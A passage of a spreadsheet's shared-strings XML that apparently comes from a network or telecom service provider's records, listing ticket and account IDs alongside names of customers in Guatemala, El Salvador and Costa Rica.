    <t>99900323T</t>
  </si>
  <si>
    <t>F4616484</t>
  </si>
  <si>
    <t>F4616486</t>
  </si>
  <si>
    <t>F4616491</t>
  </si>
  <si>
    <t>F4616496</t>
  </si>
  <si>
    <t>F4616502</t>
  </si>
  <si>
    <t>IPG000219SV</t>
  </si>
  <si>
    <t>TECNOGLOBAL S.A. DE  C.V.</t>
  </si>
  <si>
    <t>F4616512</t>
  </si>
  <si>
    <t>F4581237</t>
  </si>
  <si>
    <t>F4581251</t>
  </si>
  <si>
    <t>F4581275</t>
  </si>
  <si>
    <t>F4581309</t>
  </si>
  <si>
    <t>F4581315</t>
  </si>
  <si>
    <t>F4581316</t>
  </si>
  <si>
    <t>F4581317</t>
  </si>
  <si>
    <t>F4581363</t>
  </si>
  <si>
    <t>F4581365</t>
  </si>
  <si>
    <t>1657641OH</t>
  </si>
  <si>
    <t>65400006T</t>
  </si>
  <si>
    <t>65400005T</t>
  </si>
  <si>
    <t>F4551465</t>
  </si>
  <si>
    <t>5118018ON</t>
  </si>
  <si>
    <t>F4578343</t>
  </si>
  <si>
    <t>F4578345</t>
  </si>
  <si>
    <t>F4578346</t>
  </si>
  <si>
    <t>F4578351</t>
  </si>
  <si>
    <t>F4578353</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_AGENCIA_EL_NARANGO_MIXCO_REDUNDANTE</t>
  </si>
  <si>
    <t>622700011T</t>
  </si>
  <si>
    <t>F4578358</t>
  </si>
  <si>
    <t>F4578372</t>
  </si>
  <si>
    <t>670700019T</t>
  </si>
  <si>
    <t>670700010T</t>
  </si>
  <si>
    <t>F4578381</t>
  </si>
  <si>
    <t>F4578383</t>
  </si>
  <si>
    <t>F4578384</t>
  </si>
  <si>
    <t>F4578386</t>
  </si>
  <si>
    <t>F4578389</t>
  </si>
  <si>
    <t>23347700SV</t>
  </si>
  <si>
    <t>SERVI REPUESTOS S.A DE C.V</t>
  </si>
  <si>
    <t>F4578395</t>
  </si>
  <si>
    <t>F4578400</t>
  </si>
  <si>
    <t>F4578401</t>
  </si>
  <si>
    <t>F4578407</t>
  </si>
  <si>
    <t>F4578408</t>
  </si>
  <si>
    <t>F4578409</t>
  </si>
  <si>
    <t>F4578413</t>
  </si>
  <si>
    <t>F4578414</t>
  </si>
  <si>
    <t>F4578424</t>
  </si>
  <si>
    <t>427100115T</t>
  </si>
  <si>
    <t>F4578431</t>
  </si>
  <si>
    <t>1621157OH</t>
  </si>
  <si>
    <t>F4578444</t>
  </si>
  <si>
    <t>F4578445</t>
  </si>
  <si>
    <t>F4578449</t>
  </si>
  <si>
    <t>F4578450</t>
  </si>
  <si>
    <t>915300001T</t>
  </si>
  <si>
    <t>DISTRIBUIDORA SAGITARIO S.A.</t>
  </si>
  <si>
    <t>F4578456</t>
  </si>
  <si>
    <t>865800001T</t>
  </si>
  <si>
    <t>CENTRO DIAGNOSTICO SAN JUAN DE DIOS</t>
  </si>
  <si>
    <t>F4578461</t>
  </si>
  <si>
    <t>F4596788</t>
  </si>
  <si>
    <t>F4596808</t>
  </si>
  <si>
    <t>F4596816</t>
  </si>
  <si>
    <t>F4596819</t>
  </si>
  <si>
    <t>F4596834</t>
  </si>
  <si>
    <t>F4596836</t>
  </si>
  <si>
    <t>F4596837</t>
  </si>
  <si>
    <t>F4596841</t>
  </si>
  <si>
    <t>3331911ON</t>
  </si>
  <si>
    <t>F4596854</t>
  </si>
  <si>
    <t>CENTRO ESCOLAR CAMPOALEGRE</t>
  </si>
  <si>
    <t>F4596876</t>
  </si>
  <si>
    <t>F4596885</t>
  </si>
  <si>
    <t>F4596888</t>
  </si>
  <si>
    <t>F4596890</t>
  </si>
  <si>
    <t>F4596891</t>
  </si>
  <si>
    <t>F4596896</t>
  </si>
  <si>
    <t>1684863OH</t>
  </si>
  <si>
    <t>DHCP</t>
  </si>
  <si>
    <t>770600140T</t>
  </si>
  <si>
    <t>F4569880</t>
  </si>
  <si>
    <t>F4569881</t>
  </si>
  <si>
    <t>435200001T</t>
  </si>
  <si>
    <t>SERVICIOS TECNICOS DEL OCCIDENTE S.A.</t>
  </si>
  <si>
    <t>F4569890</t>
  </si>
  <si>
    <t>F4569893</t>
  </si>
  <si>
    <t>F4569897</t>
  </si>
  <si>
    <t>658357OH</t>
  </si>
  <si>
    <t>OH1000599117/SERVICENTRO EJECUTIVO  -</t>
  </si>
  <si>
    <t>F4569902</t>
  </si>
  <si>
    <t>IP2131002SV</t>
  </si>
  <si>
    <t>F4569911</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T212</t>
  </si>
  <si>
    <t>F4569919</t>
  </si>
  <si>
    <t>F4569925</t>
  </si>
  <si>
    <t>F4569936</t>
  </si>
  <si>
    <t>770600173T</t>
  </si>
  <si>
    <t>F4569950</t>
  </si>
  <si>
    <t>F4569955</t>
  </si>
  <si>
    <t>F4569960</t>
  </si>
  <si>
    <t>22093900SV</t>
  </si>
  <si>
    <t>SERVICIOS DE COBRO,S.A. DE C.V.</t>
  </si>
  <si>
    <t>25230300SV</t>
  </si>
  <si>
    <t>FERRETERIA LA PALMA S. A.</t>
  </si>
  <si>
    <t>F4569979</t>
  </si>
  <si>
    <t>F4569998</t>
  </si>
  <si>
    <t>296800009T</t>
  </si>
  <si>
    <t>837700002T</t>
  </si>
  <si>
    <t>DISTRIBUIDORA FERRETERA EL COLONIZADOR</t>
  </si>
  <si>
    <t>F4570011</t>
  </si>
  <si>
    <t>3541584ON</t>
  </si>
  <si>
    <t>ON0000622977/TARGET PUBLICIDAD, S.A.                 -</t>
  </si>
  <si>
    <t>F4570021</t>
  </si>
  <si>
    <t>F4594190</t>
  </si>
  <si>
    <t>F4594194</t>
  </si>
  <si>
    <t>90001910152T</t>
  </si>
  <si>
    <t>F4594198</t>
  </si>
  <si>
    <t>F4594201</t>
  </si>
  <si>
    <t>446100019T</t>
  </si>
  <si>
    <t>MP261926022SSV</t>
  </si>
  <si>
    <t>F4594208</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_BARRIO_EL_TESORO</t>
  </si>
  <si>
    <t>369600001T</t>
  </si>
  <si>
    <t>CMARKET S.A.</t>
  </si>
  <si>
    <t>F4594218</t>
  </si>
  <si>
    <t>F4594225</t>
  </si>
  <si>
    <t>340500066T</t>
  </si>
  <si>
    <t>F4594229</t>
  </si>
  <si>
    <t>F4594231</t>
  </si>
  <si>
    <t>7300194T</t>
  </si>
  <si>
    <t>F4594235</t>
  </si>
  <si>
    <t>IPG003095SV</t>
  </si>
  <si>
    <t>F4594242</t>
  </si>
  <si>
    <t>344400706T</t>
  </si>
  <si>
    <t>344400707T</t>
  </si>
  <si>
    <t>90001903662T</t>
  </si>
  <si>
    <t>F4594250</t>
  </si>
  <si>
    <t>344400699T</t>
  </si>
  <si>
    <t>F4594255</t>
  </si>
  <si>
    <t>924200001T</t>
  </si>
  <si>
    <t>ACEROS DE GUATEMALA, S.A. </t>
  </si>
  <si>
    <t>F4594270</t>
  </si>
  <si>
    <t>F4594271</t>
  </si>
  <si>
    <t>F4594272</t>
  </si>
  <si>
    <t>F4594273</t>
  </si>
  <si>
    <t>F4594275</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0728</t>
  </si>
  <si>
    <t>F4594276</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0158</t>
  </si>
  <si>
    <t>F4594282</t>
  </si>
  <si>
    <t>F4594283</t>
  </si>
  <si>
    <t>F4594288</t>
  </si>
  <si>
    <t>1735676OH</t>
  </si>
  <si>
    <t>430700005T</t>
  </si>
  <si>
    <t>FINCA NETWORK SUPPORT, B.V.</t>
  </si>
  <si>
    <t>CC_GMG_CR_INTERNET_T124_DESAMPARADOS</t>
  </si>
  <si>
    <t>F4594306</t>
  </si>
  <si>
    <t>F4594316</t>
  </si>
  <si>
    <t>F4594318</t>
  </si>
  <si>
    <t>696595OH</t>
  </si>
  <si>
    <t>F4606916</t>
  </si>
  <si>
    <t>937021OH</t>
  </si>
  <si>
    <t>F4606955</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3097</t>
  </si>
  <si>
    <t>F4606991</t>
  </si>
  <si>
    <t>F4606994</t>
  </si>
  <si>
    <t>F4607012</t>
  </si>
  <si>
    <t>F4607015</t>
  </si>
  <si>
    <t>357500037T</t>
  </si>
  <si>
    <t>F4607051</t>
  </si>
  <si>
    <t>4624862ON</t>
  </si>
  <si>
    <t>826631OC</t>
  </si>
  <si>
    <t>F4542776</t>
  </si>
  <si>
    <t>F4542801</t>
  </si>
  <si>
    <t>F4581697</t>
  </si>
  <si>
    <t>F4581698</t>
  </si>
  <si>
    <t>F4581700</t>
  </si>
  <si>
    <t>625900239T</t>
  </si>
  <si>
    <t>F4581719</t>
  </si>
  <si>
    <t>F4581729</t>
  </si>
  <si>
    <t>F4581732</t>
  </si>
  <si>
    <t>F4581733</t>
  </si>
  <si>
    <t>F4581745</t>
  </si>
  <si>
    <t>F4581748</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_MAZATENANGO_SUC005785</t>
  </si>
  <si>
    <t>F4581749</t>
  </si>
  <si>
    <t>F4581750</t>
  </si>
  <si>
    <t>F4581751</t>
  </si>
  <si>
    <t>F4581752</t>
  </si>
  <si>
    <t>F4581758</t>
  </si>
  <si>
    <t>61200231T</t>
  </si>
  <si>
    <t>F4581776</t>
  </si>
  <si>
    <t>F4581777</t>
  </si>
  <si>
    <t>F4581778</t>
  </si>
  <si>
    <t>F4581805</t>
  </si>
  <si>
    <t>829800073T</t>
  </si>
  <si>
    <t>F4581830</t>
  </si>
  <si>
    <t>770600166T</t>
  </si>
  <si>
    <t>F4581843</t>
  </si>
  <si>
    <t>F4581845</t>
  </si>
  <si>
    <t>5152563ON</t>
  </si>
  <si>
    <t>F4616521</t>
  </si>
  <si>
    <t>F4616529</t>
  </si>
  <si>
    <t>F4616543</t>
  </si>
  <si>
    <t>F4616549</t>
  </si>
  <si>
    <t>F4616551</t>
  </si>
  <si>
    <t>F4616553</t>
  </si>
  <si>
    <t>340500138T</t>
  </si>
  <si>
    <t>F4616575</t>
  </si>
  <si>
    <t>38300540T</t>
  </si>
  <si>
    <t>F4616576</t>
  </si>
  <si>
    <t>38300592T</t>
  </si>
  <si>
    <t>F4616588</t>
  </si>
  <si>
    <t>F4616602</t>
  </si>
  <si>
    <t>F4616604</t>
  </si>
  <si>
    <t>F4616631</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM5124</t>
  </si>
  <si>
    <t>F4616658</t>
  </si>
  <si>
    <t>F4616664</t>
  </si>
  <si>
    <t>F4616665</t>
  </si>
  <si>
    <t>90001902547T</t>
  </si>
  <si>
    <t>F4616677</t>
  </si>
  <si>
    <t>F4583157</t>
  </si>
  <si>
    <t>IP2141030SV</t>
  </si>
  <si>
    <t>F4583186</t>
  </si>
  <si>
    <t>22346700SV</t>
  </si>
  <si>
    <t>CLINICA DE IMAGENOLOGIA AVANZADA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4583196</t>
  </si>
  <si>
    <t>745300001T</t>
  </si>
  <si>
    <t>LATINETWORK DICHTER &amp; NEIRA GUATEMALA</t>
  </si>
  <si>
    <t>F4583204</t>
  </si>
  <si>
    <t>CENTRO GUATEMALTECO DE INVESTIGACION Y CAPACITACION DE LA CAÑA DE AZU</t>
  </si>
  <si>
    <t>F4583210</t>
  </si>
  <si>
    <t>F4583212</t>
  </si>
  <si>
    <t>F4583218</t>
  </si>
  <si>
    <t>F4583222</t>
  </si>
  <si>
    <t>F4583227</t>
  </si>
  <si>
    <t>F4583230</t>
  </si>
  <si>
    <t>F4583238</t>
  </si>
  <si>
    <t>22043900SV</t>
  </si>
  <si>
    <t>ARMANDO EFRAIN CISNEROS</t>
  </si>
  <si>
    <t>F4583242</t>
  </si>
  <si>
    <t>F4583243</t>
  </si>
  <si>
    <t>F4583244</t>
  </si>
  <si>
    <t>F4583247</t>
  </si>
  <si>
    <t>F4583261</t>
  </si>
  <si>
    <t>758500518T</t>
  </si>
  <si>
    <t>5654495ON</t>
  </si>
  <si>
    <t>F4583272</t>
  </si>
  <si>
    <t>F4583274</t>
  </si>
  <si>
    <t>F4583279</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C142</t>
  </si>
  <si>
    <t>F4583281</t>
  </si>
  <si>
    <t>F4583283</t>
  </si>
  <si>
    <t>F4583284</t>
  </si>
  <si>
    <t>825300011T</t>
  </si>
  <si>
    <t>F4551555</t>
  </si>
  <si>
    <t>F4551556</t>
  </si>
  <si>
    <t>F4551558</t>
  </si>
  <si>
    <t>F4551561</t>
  </si>
  <si>
    <t>F4551585</t>
  </si>
  <si>
    <t>F4551589</t>
  </si>
  <si>
    <t>F4551594</t>
  </si>
  <si>
    <t>F4551597</t>
  </si>
  <si>
    <t>F4551607</t>
  </si>
  <si>
    <t>CONTR0001455740OC</t>
  </si>
  <si>
    <t>CONTR0002286175OC</t>
  </si>
  <si>
    <t>292900054T</t>
  </si>
  <si>
    <t>F4551620</t>
  </si>
  <si>
    <t>F4551626</t>
  </si>
  <si>
    <t>F4551637</t>
  </si>
  <si>
    <t>F4551638</t>
  </si>
  <si>
    <t>8900306T</t>
  </si>
  <si>
    <t>F4551642</t>
  </si>
  <si>
    <t>F4551643</t>
  </si>
  <si>
    <t>F4551645</t>
  </si>
  <si>
    <t>F4551654</t>
  </si>
  <si>
    <t>F4551656</t>
  </si>
  <si>
    <t>F4551658</t>
  </si>
  <si>
    <t>F4580877</t>
  </si>
  <si>
    <t>5421285ON</t>
  </si>
  <si>
    <t>97100270T</t>
  </si>
  <si>
    <t>F4580893</t>
  </si>
  <si>
    <t>F4580918</t>
  </si>
  <si>
    <t>F4580921</t>
  </si>
  <si>
    <t>F4580926</t>
  </si>
  <si>
    <t>F4580928</t>
  </si>
  <si>
    <t>F4580929</t>
  </si>
  <si>
    <t>F4580933</t>
  </si>
  <si>
    <t>F4580941</t>
  </si>
  <si>
    <t>F4580943</t>
  </si>
  <si>
    <t>589300001T</t>
  </si>
  <si>
    <t>INVERSIONES QUIXIL, S.A.</t>
  </si>
  <si>
    <t>F4580969</t>
  </si>
  <si>
    <t>F4580970</t>
  </si>
  <si>
    <t>F4580981</t>
  </si>
  <si>
    <t>F4580982</t>
  </si>
  <si>
    <t>F4580984</t>
  </si>
  <si>
    <t>F4580986</t>
  </si>
  <si>
    <t>F4580991</t>
  </si>
  <si>
    <t>F4580998</t>
  </si>
  <si>
    <t>F4581007</t>
  </si>
  <si>
    <t>F4581013</t>
  </si>
  <si>
    <t>F4581023</t>
  </si>
  <si>
    <t>F4581029</t>
  </si>
  <si>
    <t>F4597073</t>
  </si>
  <si>
    <t>F4597080</t>
  </si>
  <si>
    <t>F4597101</t>
  </si>
  <si>
    <t>F4597103</t>
  </si>
  <si>
    <t>F4597109</t>
  </si>
  <si>
    <t>758500251T</t>
  </si>
  <si>
    <t>F4597118</t>
  </si>
  <si>
    <t>F4597120</t>
  </si>
  <si>
    <t>F4597122</t>
  </si>
  <si>
    <t>90001910500T</t>
  </si>
  <si>
    <t>450603ON</t>
  </si>
  <si>
    <t>450589ON</t>
  </si>
  <si>
    <t>F4597139</t>
  </si>
  <si>
    <t>F4597140</t>
  </si>
  <si>
    <t>F4597153</t>
  </si>
  <si>
    <t>F4597163</t>
  </si>
  <si>
    <t>5170929ON</t>
  </si>
  <si>
    <t>4671631ON</t>
  </si>
  <si>
    <t>F4597180</t>
  </si>
  <si>
    <t>38300590T</t>
  </si>
  <si>
    <t>23627600SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE SAN ESTEBAN CATARINA</t>
  </si>
  <si>
    <t>F4597198</t>
  </si>
  <si>
    <t>IP2090001SV</t>
  </si>
  <si>
    <t>F4597200</t>
  </si>
  <si>
    <t>F4597201</t>
  </si>
  <si>
    <t>F4597224</t>
  </si>
  <si>
    <t>F4597226</t>
  </si>
  <si>
    <t>F4570815</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0811</t>
  </si>
  <si>
    <t>F4570826</t>
  </si>
  <si>
    <t>F4570840</t>
  </si>
  <si>
    <t>F4570870</t>
  </si>
  <si>
    <t>F4570886</t>
  </si>
  <si>
    <t>F4570928</t>
  </si>
  <si>
    <t>F4595767</t>
  </si>
  <si>
    <t>651399OH</t>
  </si>
  <si>
    <t>F4595782</t>
  </si>
  <si>
    <t>F4595792</t>
  </si>
  <si>
    <t>F4595802</t>
  </si>
  <si>
    <t>F4595805</t>
  </si>
  <si>
    <t>F4595808</t>
  </si>
  <si>
    <t>F4595812</t>
  </si>
  <si>
    <t>8900396T</t>
  </si>
  <si>
    <t>F4595819</t>
  </si>
  <si>
    <t>F4595823</t>
  </si>
  <si>
    <t>450539ON</t>
  </si>
  <si>
    <t>F4595834</t>
  </si>
  <si>
    <t>F4595835</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4482</t>
  </si>
  <si>
    <t>F4595837</t>
  </si>
  <si>
    <t>F4595838</t>
  </si>
  <si>
    <t>F4595843</t>
  </si>
  <si>
    <t>817400001T</t>
  </si>
  <si>
    <t>GRUPO EMPRESARIAL DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4595857</t>
  </si>
  <si>
    <t>F4595858</t>
  </si>
  <si>
    <t>F4595859</t>
  </si>
  <si>
    <t>361700091T</t>
  </si>
  <si>
    <t>CONTR0001524601OC</t>
  </si>
  <si>
    <t>F4595863</t>
  </si>
  <si>
    <t>F4595868</t>
  </si>
  <si>
    <t>F4595872</t>
  </si>
  <si>
    <t>F4595873</t>
  </si>
  <si>
    <t>F4595896</t>
  </si>
  <si>
    <t>F4607757</t>
  </si>
  <si>
    <t>F4607771</t>
  </si>
  <si>
    <t>F4607782</t>
  </si>
  <si>
    <t>F4607791</t>
  </si>
  <si>
    <t>1668004OH</t>
  </si>
  <si>
    <t>F4607799</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0762</t>
  </si>
  <si>
    <t>F4607809</t>
  </si>
  <si>
    <t>F4607817</t>
  </si>
  <si>
    <t>F4607818</t>
  </si>
  <si>
    <t>47502963T</t>
  </si>
  <si>
    <t>F4607837</t>
  </si>
  <si>
    <t>F4607839</t>
  </si>
  <si>
    <t>97100181T</t>
  </si>
  <si>
    <t>F4607847</t>
  </si>
  <si>
    <t>47503420T</t>
  </si>
  <si>
    <t>F4607851</t>
  </si>
  <si>
    <t>F4607870</t>
  </si>
  <si>
    <t>F4607871</t>
  </si>
  <si>
    <t>F4607874</t>
  </si>
  <si>
    <t>47503673T</t>
  </si>
  <si>
    <t>F4607875</t>
  </si>
  <si>
    <t>F4607884</t>
  </si>
  <si>
    <t>F4607886</t>
  </si>
  <si>
    <t>F4607890</t>
  </si>
  <si>
    <t>F4607896</t>
  </si>
  <si>
    <t>F4607909</t>
  </si>
  <si>
    <t>F4545936</t>
  </si>
  <si>
    <t>F4545938</t>
  </si>
  <si>
    <t>F4545954</t>
  </si>
  <si>
    <t>F4545955</t>
  </si>
  <si>
    <t>F4545962</t>
  </si>
  <si>
    <t>F4545980</t>
  </si>
  <si>
    <t>F4545989</t>
  </si>
  <si>
    <t>F4545992</t>
  </si>
  <si>
    <t>F4545993</t>
  </si>
  <si>
    <t>400000085T</t>
  </si>
  <si>
    <t>F4582992</t>
  </si>
  <si>
    <t>F4583063</t>
  </si>
  <si>
    <t>F4583066</t>
  </si>
  <si>
    <t>F4583069</t>
  </si>
  <si>
    <t>F4583073</t>
  </si>
  <si>
    <t>F4583078</t>
  </si>
  <si>
    <t>297400241T</t>
  </si>
  <si>
    <t>ID1149030SV</t>
  </si>
  <si>
    <t>F4583086</t>
  </si>
  <si>
    <t>F4583089</t>
  </si>
  <si>
    <t>F4583096</t>
  </si>
  <si>
    <t>90001908823T</t>
  </si>
  <si>
    <t>367400009T</t>
  </si>
  <si>
    <t>F4583110</t>
  </si>
  <si>
    <t>F4583118</t>
  </si>
  <si>
    <t>F4583120</t>
  </si>
  <si>
    <t>90001901396T</t>
  </si>
  <si>
    <t>AVI S.A</t>
  </si>
  <si>
    <t>1701701OH</t>
  </si>
  <si>
    <t>FUTECA S.A</t>
  </si>
  <si>
    <t>F4617035</t>
  </si>
  <si>
    <t>F4617036</t>
  </si>
  <si>
    <t>47503309T</t>
  </si>
  <si>
    <t>F4617138</t>
  </si>
  <si>
    <t>F4533361</t>
  </si>
  <si>
    <t>F4552129</t>
  </si>
  <si>
    <t>846300002T</t>
  </si>
  <si>
    <t>SISTEMS ENTERPRISE S.A.</t>
  </si>
  <si>
    <t>F4552152</t>
  </si>
  <si>
    <t>F4552164</t>
  </si>
  <si>
    <t>F4552166</t>
  </si>
  <si>
    <t>F4552169</t>
  </si>
  <si>
    <t>F4552174</t>
  </si>
  <si>
    <t>881200002T</t>
  </si>
  <si>
    <t>CORPORACIÓN GRUPO WILSON, S.A.</t>
  </si>
  <si>
    <t>F4552178</t>
  </si>
  <si>
    <t>881200001T</t>
  </si>
  <si>
    <t>F4552184</t>
  </si>
  <si>
    <t>F4552187</t>
  </si>
  <si>
    <t>F4552188</t>
  </si>
  <si>
    <t>F4552189</t>
  </si>
  <si>
    <t>F4552200</t>
  </si>
  <si>
    <t>F4552201</t>
  </si>
  <si>
    <t>640600012T</t>
  </si>
  <si>
    <t>F4552230</t>
  </si>
  <si>
    <t>F4552231</t>
  </si>
  <si>
    <t>F4552232</t>
  </si>
  <si>
    <t>F4552236</t>
  </si>
  <si>
    <t>F4552237</t>
  </si>
  <si>
    <t>F4552252</t>
  </si>
  <si>
    <t>F4552263</t>
  </si>
  <si>
    <t>F4552273</t>
  </si>
  <si>
    <t>F4552278</t>
  </si>
  <si>
    <t>99900362T</t>
  </si>
  <si>
    <t>F4583948</t>
  </si>
  <si>
    <t>F4583949</t>
  </si>
  <si>
    <t>F4583987</t>
  </si>
  <si>
    <t>CC_WALMART_SV_MAXI_SAN_MARCOS</t>
  </si>
  <si>
    <t>F4584051</t>
  </si>
  <si>
    <t>F4597390</t>
  </si>
  <si>
    <t>22463740SV</t>
  </si>
  <si>
    <t>F4597394</t>
  </si>
  <si>
    <t>706500001T</t>
  </si>
  <si>
    <t>FITNESS ONCITE CORPORATION, S.A.</t>
  </si>
  <si>
    <t>F4597412</t>
  </si>
  <si>
    <t>25100300SV</t>
  </si>
  <si>
    <t>FUNDACION SALVADORENA DE FOMENTO EDUCATIVO</t>
  </si>
  <si>
    <t>539700007T</t>
  </si>
  <si>
    <t>F4597434</t>
  </si>
  <si>
    <t>F4597435</t>
  </si>
  <si>
    <t>F4597445</t>
  </si>
  <si>
    <t>F4597458</t>
  </si>
  <si>
    <t>F4597472</t>
  </si>
  <si>
    <t>F4597474</t>
  </si>
  <si>
    <t>658300004T</t>
  </si>
  <si>
    <t>F4597479</t>
  </si>
  <si>
    <t>F4597481</t>
  </si>
  <si>
    <t>F4597497</t>
  </si>
  <si>
    <t>F4597507</t>
  </si>
  <si>
    <t>F4597508</t>
  </si>
  <si>
    <t>IP2105230SV</t>
  </si>
  <si>
    <t>71100074T</t>
  </si>
  <si>
    <t>F4597536</t>
  </si>
  <si>
    <t>F4597537</t>
  </si>
  <si>
    <t>F4597542</t>
  </si>
  <si>
    <t>ID1172017SV</t>
  </si>
  <si>
    <t>F4576270</t>
  </si>
  <si>
    <t>F4576271</t>
  </si>
  <si>
    <t>340500045T</t>
  </si>
  <si>
    <t>340500046T</t>
  </si>
  <si>
    <t>21320100SV</t>
  </si>
  <si>
    <t>BENEDETTI ZELAYA S.A DE C.V</t>
  </si>
  <si>
    <t>829800067T</t>
  </si>
  <si>
    <t>829800068T</t>
  </si>
  <si>
    <t>F4576288</t>
  </si>
  <si>
    <t>1699876OH</t>
  </si>
  <si>
    <t>OH1001067377</t>
  </si>
  <si>
    <t>F4576294</t>
  </si>
  <si>
    <t>F4576300</t>
  </si>
  <si>
    <t>F4576307</t>
  </si>
  <si>
    <t>F4576308</t>
  </si>
  <si>
    <t>F4576318</t>
  </si>
  <si>
    <t>F4576321</t>
  </si>
  <si>
    <t>F4576328</t>
  </si>
  <si>
    <t>F4576332</t>
  </si>
  <si>
    <t>F4576333</t>
  </si>
  <si>
    <t>F4576334</t>
  </si>
  <si>
    <t>F4576361</t>
  </si>
  <si>
    <t>F4576369</t>
  </si>
  <si>
    <t>F4576372</t>
  </si>
  <si>
    <t>F4576373</t>
  </si>
  <si>
    <t>F4576374</t>
  </si>
  <si>
    <t>F4576388</t>
  </si>
  <si>
    <t>IPG003053SV</t>
  </si>
  <si>
    <t>F4597238</t>
  </si>
  <si>
    <t>F4597248</t>
  </si>
  <si>
    <t>F4597254</t>
  </si>
  <si>
    <t>F4597266</t>
  </si>
  <si>
    <t>F4597267</t>
  </si>
  <si>
    <t>F4597270</t>
  </si>
  <si>
    <t>F4597282</t>
  </si>
  <si>
    <t>90001911273T</t>
  </si>
  <si>
    <t>F4597290</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_770</t>
  </si>
  <si>
    <t>F4597291</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_316</t>
  </si>
  <si>
    <t>F4597296</t>
  </si>
  <si>
    <t>F4597313</t>
  </si>
  <si>
    <t>F4597319</t>
  </si>
  <si>
    <t>F4597341</t>
  </si>
  <si>
    <t>5535827ON</t>
  </si>
  <si>
    <t>F4597355</t>
  </si>
  <si>
    <t>1735706OH</t>
  </si>
  <si>
    <t>F4597376</t>
  </si>
  <si>
    <t>1717291OH</t>
  </si>
  <si>
    <t>F4597385</t>
  </si>
  <si>
    <t>349900231T</t>
  </si>
  <si>
    <t>F4607925</t>
  </si>
  <si>
    <t>F4607935</t>
  </si>
  <si>
    <t>F4607945</t>
  </si>
  <si>
    <t>F4607956</t>
  </si>
  <si>
    <t>F4607959</t>
  </si>
  <si>
    <t>F4607964</t>
  </si>
  <si>
    <t>F4607985</t>
  </si>
  <si>
    <t>F4607986</t>
  </si>
  <si>
    <t>F4608007</t>
  </si>
  <si>
    <t>F4608008</t>
  </si>
  <si>
    <t>F4608021</t>
  </si>
  <si>
    <t>F4608037</t>
  </si>
  <si>
    <t>F4608038</t>
  </si>
  <si>
    <t>F4608040</t>
  </si>
  <si>
    <t>F4608054</t>
  </si>
  <si>
    <t>F4608067</t>
  </si>
  <si>
    <t>F4608075</t>
  </si>
  <si>
    <t>IP2204078SV</t>
  </si>
  <si>
    <t>F4583632</t>
  </si>
  <si>
    <t>F4583633</t>
  </si>
  <si>
    <t>F4583634</t>
  </si>
  <si>
    <t>F4583639</t>
  </si>
  <si>
    <t>465300003T</t>
  </si>
  <si>
    <t>90001904744T</t>
  </si>
  <si>
    <t>BANCO INDUSTRIALDE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4583648</t>
  </si>
  <si>
    <t>F4583651</t>
  </si>
  <si>
    <t>F4583654</t>
  </si>
  <si>
    <t>F4583655</t>
  </si>
  <si>
    <t>933100001T</t>
  </si>
  <si>
    <t>LAVANDERIAS, S.A.</t>
  </si>
  <si>
    <t>F4583663</t>
  </si>
  <si>
    <t>F4583669</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0194</t>
  </si>
  <si>
    <t>586600001T</t>
  </si>
  <si>
    <t>PROPIEDADES CORPORATIVAS S.A.</t>
  </si>
  <si>
    <t>F4583675</t>
  </si>
  <si>
    <t>F4583677</t>
  </si>
  <si>
    <t>IP2089012SV</t>
  </si>
  <si>
    <t>21500024T</t>
  </si>
  <si>
    <t>90001906457T</t>
  </si>
  <si>
    <t>F4583707</t>
  </si>
  <si>
    <t>F4583708</t>
  </si>
  <si>
    <t>F4583709</t>
  </si>
  <si>
    <t>F4583716</t>
  </si>
  <si>
    <t>F4583717</t>
  </si>
  <si>
    <t>CC_FICOHSA_GT_INTERNET_AGENCIA_0589</t>
  </si>
  <si>
    <t>F4583719</t>
  </si>
  <si>
    <t>F4583720</t>
  </si>
  <si>
    <t>F4583721</t>
  </si>
  <si>
    <t>F4583734</t>
  </si>
  <si>
    <t>F4583735</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0322</t>
  </si>
  <si>
    <t>F4583736</t>
  </si>
  <si>
    <t>CONTR0001228341OC</t>
  </si>
  <si>
    <t>738700001T</t>
  </si>
  <si>
    <t>JOSE DAVID ALEJANDRO RECINOS GUTIERREZ</t>
  </si>
  <si>
    <t>F4583753</t>
  </si>
  <si>
    <t>F4583759</t>
  </si>
  <si>
    <t>F4617672</t>
  </si>
  <si>
    <t>F4617673</t>
  </si>
  <si>
    <t>F4617675</t>
  </si>
  <si>
    <t>F4617677</t>
  </si>
  <si>
    <t>F4617678</t>
  </si>
  <si>
    <t>901700001T</t>
  </si>
  <si>
    <t>SILVIA ESTELA LIUTI BROLO DE GRIJALVA</t>
  </si>
  <si>
    <t>F4617707</t>
  </si>
  <si>
    <t>F4617711</t>
  </si>
  <si>
    <t>F4617713</t>
  </si>
  <si>
    <t>625900154T</t>
  </si>
  <si>
    <t>F4617732</t>
  </si>
  <si>
    <t>F4617768</t>
  </si>
  <si>
    <t>F4617784</t>
  </si>
  <si>
    <t>F4617794</t>
  </si>
  <si>
    <t>F4617796</t>
  </si>
  <si>
    <t>F4617798</t>
  </si>
  <si>
    <t>F4533565</t>
  </si>
  <si>
    <t>F4554433</t>
  </si>
  <si>
    <t>F4554434</t>
  </si>
  <si>
    <t>F4554440</t>
  </si>
  <si>
    <t>F4554442</t>
  </si>
  <si>
    <t>F4554443</t>
  </si>
  <si>
    <t>F4554452</t>
  </si>
  <si>
    <t>551684OH</t>
  </si>
  <si>
    <t>F4554461</t>
  </si>
  <si>
    <t>F4554463</t>
